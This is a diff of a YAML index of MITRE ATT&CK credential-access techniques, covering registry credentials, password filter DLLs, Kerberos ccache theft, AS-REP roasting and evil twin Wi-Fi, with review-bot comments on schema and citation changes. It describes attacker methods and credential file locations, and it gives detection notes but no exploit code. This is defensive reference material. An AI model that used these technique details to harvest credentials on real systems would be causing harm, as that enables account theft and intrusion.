name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44243,38 +44888,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -44298,76 +44918,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
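Review bot: the new T1558.005 object ends with `x_mitre_modified_by_ref` followed directly by `atomic_tests: []` and has no `identifier: T1558.005` line, while the T1556.002 object rebuilt just above keeps `identifier: T1556.002` and the T1558.004 object that follows keeps `identifier: T1558.004`. Either add the key here or document that the generator omits it deliberately, because consumers that key on `identifier` will not see the new sub-technique. Two smaller points in the same hunk: T1556.002 loses `x_mitre_permissions_required: - Administrator - SYSTEM` under its `'2.0'` to `'2.1'` bump, which is the only information loss in its rewrite and deserves a mention in the commit message; and the T1558.005 description is passed through verbatim with a leading `\n`, a trailing space before the closing quote, and an empty `x_mitre_detection: ''`, which is harmless but could be trimmed by the generator. The source_name `Brining MimiKatz to Unix` is the upstream citation key and must stay misspelled so the `(Citation: Brining MimiKatz to Unix)` marker in the description still resolves.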
@@ -44402,6 +45075,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44409,32 +45089,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
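Review bot: the Linux SSSD and macOS ccache paragraphs are removed from the T1558 parent description, leaving only the Windows `klist` sentence after the KDC overview. The new T1558.005 sub-technique added earlier in this diff covers ccache files on Linux and macOS, but the SSSD detail (`/var/lib/sss/secrets/secrets.ldb` and `/var/lib/sss/secrets/.secrets.mkey`, both root-readable) and the `MIT ccache` citation do not reappear there, so that specific guidance is gone from the index rather than relocated; if this file is meant to mirror upstream ATT&CK verbatim that is expected, but the commit message should say so. In the same hunk T1558.004 loses `x_mitre_permissions_required: - User` under its `'1.0'` to `'1.1'` bump, matching the pattern in the other rebuilt objects.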
@@ -44470,7 +45186,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -44495,13 +45211,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
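Review bot: dropping the `Kekeo` and `SpectorOps Bifrost Kerberos macOS 2019` references from T1558 is consistent with the description change, since the only `(Citation: ...)` markers left in the retained T1558 text are `ADSecurity Kerberos Ring Decoder` and `Microsoft Klist`, and both removed references are re-added under the new T1558.005 object, so the index as a whole keeps them. It would be worth having the generator (or CI) check that every `(Citation: X)` in a description has a matching `source_name: X` in the same object's `external_references`, because a paragraph-plus-reference move like this one is exactly where a dangling citation slips in.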
@@ -44510,14 +45219,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
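Review bot: unlike the Kekeo and SpectorOps entries, the `macOS kerberos framework MIT` and `MIT ccache` references removed here are not re-added anywhere in this diff, so the MIT credential-cache documentation links disappear from the index entirely along with the paragraphs that cited them. That is consistent with the retained T1558 description, which no longer cites either, but if the repository tracks reference coverage or links test documentation to these URLs, note the removal in the commit message.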
@@ -44539,23 +45240,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -44606,12 +45298,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -44623,6 +45314,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -44637,18 +45329,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
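Review bot: the T1552 platform list gets the same consolidation as T1606.002 earlier in the diff (`Azure AD`, `Office 365` and `Google Workspace` replaced by `Office Suite` and `Identity Provider`, `x_mitre_version` `'1.3'` to `'1.4'`), so any platform-keyed index or filter has to be updated for both techniques together. The `+ x_mitre_modified_by_ref: identity--c78cb6e5-...` line inserted between `x_mitre_is_subtechnique` and `x_mitre_platforms`, like the `+ x_mitre_attack_spec_version: 3.2.0` added after `kill_chain_phases` in the previous hunk, has no matching `-` line in the visible hunks; confirm the old end-of-object copies are removed in the part of the next hunk that is cut off, otherwise the object ends up with duplicate keys, which YAML loaders either reject or silently resolve to the last occurrence.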
@@ -44671,37 +45363,115 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ identifier: T1552
+ atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- identifier: T1552
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
